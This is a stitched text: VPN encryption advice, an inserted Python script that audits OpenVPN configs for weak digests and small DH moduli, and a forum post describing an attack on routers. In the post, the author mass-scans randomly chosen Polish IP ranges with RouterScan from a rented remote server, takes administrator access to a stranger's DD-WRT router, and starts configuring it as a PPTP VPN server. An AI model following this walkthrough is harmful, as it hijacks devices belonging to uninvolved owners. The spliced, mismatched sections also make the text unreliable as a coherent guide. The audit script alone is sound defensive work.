As Snowden argues, “Encryption really helps. You can really rely on reliable and well-tuned encryption systems.” Accordingly, you should avoid VPN services that rely predominantly on the SHA-1 or MD5 hashing algorithms, as well as on the PPTP or L2TP/IPsec protocols. It is worth choosing a VPN service that uses the latest version of OpenVPN (an extremely secure option) or SHA-2 hashing. If you cannot determine for sure which encryption algorithms the service uses, look for this information in the user manual or contact the service's customer support.
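One defensive check that follows from the advice above, added here as an example and not part of the original article: a small Python audit of an OpenVPN server configuration that parses the `dh` parameter file (PEM-wrapped DER, a SEQUENCE of the modulus p and generator g) and flags a modulus below 2048 bits, and that flags `auth MD5` or `auth SHA1`. The function names, the sample config and the DH blob are assumptions of this example; the blob's modulus is a constructed 1024-bit odd number, not a real safe prime.

```python
import base64
WEAK_AUTH = {"MD5", "SHA1", "NONE"}   # HMAC digests the article says to avoid
MIN_DH_BITS = 2048                      # Halderman and Heninger's recommended minimum

def der_length(n):
    """Encode a DER length in short or long form."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([n]) if n < 0x80 else bytes([0x80 | len(raw)]) + raw

def read_der_length(buf, i):
    """Decode the DER length at buf[i]; return (length, offset of the first content byte)."""
    n = buf[i] & 0x7F if buf[i] & 0x80 else 0        # long form: the next n bytes hold the length
    return (int.from_bytes(buf[i + 1:i + 1 + n], "big") if n else buf[i]), i + 1 + n

def make_dh_pem(p, g=2):
    """Build a PEM 'DH PARAMETERS' blob, SEQUENCE { INTEGER p, INTEGER g } (used for the sample)."""
    def der_int(x):                                  # one spare byte keeps the sign bit clear
        raw = x.to_bytes((x.bit_length() + 8) // 8, "big")
        return b"\x02" + der_length(len(raw)) + raw
    body = der_int(p) + der_int(g)
    b64 = base64.b64encode(b"\x30" + der_length(len(body)) + body).decode()
    return "-----BEGIN DH PARAMETERS-----\n" + b64 + "\n-----END DH PARAMETERS-----\n"

def dh_prime_bits(pem):
    """Return the bit length of the modulus p in a PEM 'DH PARAMETERS' blob."""
    der = base64.b64decode("".join(l for l in pem.splitlines() if "-----" not in l))
    _, i = read_der_length(der, 1)                    # skip the outer SEQUENCE header
    if der[0] != 0x30 or der[i] != 0x02:
        raise ValueError("expected SEQUENCE { INTEGER p, INTEGER g }")
    plen, j = read_der_length(der, i + 1)
    return int.from_bytes(der[j:j + plen], "big").bit_length()

def audit_openvpn(config_text, files):
    """Flag weak 'auth' digests and sub-2048-bit 'dh' files; `files` maps a dh path to its PEM text."""
    findings = []
    for line in config_text.splitlines():
        parts = line.split()
        if not parts or parts[0][0] in "#;":          # blank or comment line
            continue
        key, args = parts[0].lower(), parts[1:]
        if key == "auth" and args and args[0].upper() in WEAK_AUTH:
            findings.append(f"auth {args[0]}: weak HMAC digest, use SHA256 or stronger")
        elif key == "dh" and args and args[0].lower() != "none":   # 'dh none' means ECDH only
            bits = dh_prime_bits(files[args[0]])
            if bits < MIN_DH_BITS:
                findings.append(f"dh {args[0]}: {bits}-bit modulus is in Logjam range, use {MIN_DH_BITS}+")
    return findings

SAMPLE_FILES = {"dh1024.pem": make_dh_pem((1 << 1023) | 1)}   # constructed 1024-bit odd number, not a real prime
SAMPLE_CONFIG = "port 1194\nproto udp\ndh dh1024.pem\ncipher AES-256-GCM\nauth SHA1\n"
```

On a real server, read the `dh` file named in the config from disk instead of the constructed `SAMPLE_FILES` map; `openssl dhparam` output uses the same PEM structure.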

VPNs are your friends. Trust the encryption, don't doubt the math. Use VPNs as often as possible, try to make sure your exit points are also secure. This way you can stay safe even if your encrypted tunnel gets hacked.

@SooLFaa:
Without hesitation, I decided to take the recommendation literally.

Acquaintance and launch of the program.

The routers will be attacked not from my local machine but from a specially rented remote VDS running Windows. A double left-click takes me to the Netherlands.
As the title says, RouterScan will act as the attack tool. To download the program, we go to the Antichat forum. According to the author, the program should only be downloaded from there.

The program is portable; installing it consists of unpacking the downloaded archive into a folder of your choice.
By default, the program attacks routers on ports 80, 8080 and 1080. I think this list is quite justified and does not require any additions or changes.
In addition, the program can enable additional modules:
  • Router Scan (main)
  • Detect proxy servers
  • Use HNAP 1.0
  • SQLite Manager RCE
  • Hudson Java Servlet
  • phpMyAdmin RCE

and, together with the attack on routers, "probe" all IPs in the given range.
But such a load will significantly slow the program down, so we will not touch anything in this window; after all, the purpose of the attack is to access the web interface of one random router for writing an article.

It remains only to select the IP range for the attack, and then the program can be run.
We go to a site that provides IP ranges by country and as the victim we randomly pick Poland (the choice of country is random).
After the desired ranges are pasted into the corresponding program window, the program can be started.
The time spent hacking routers depends on the number of IPs in the selected range and can be quite long.
But to write this article I only need one hacked router on which a VPN server can be set up. These could be ASUS routers, Mikrotik, or any other model with DD-WRT firmware... After a quick look at the list of routers that appeared in the "Good Results" tab, it is easy to see that such models are in the list.

Setting up the VPN server on the router.

For the role of the victim in this article, I chose a router running DD-WRT.

My choice is explained by the fact that the mentioned firmware provides the ability to use the router as a VPN server using the PPTP protocol, and more recently I devoted this protocol.

Copy the URL of the chosen router into the browser's address bar, and after the page loads we find ourselves in its web interface with administrator rights.

In order for the router to play the role of a VPN server, you need to go to the Services tab and then to PPTP.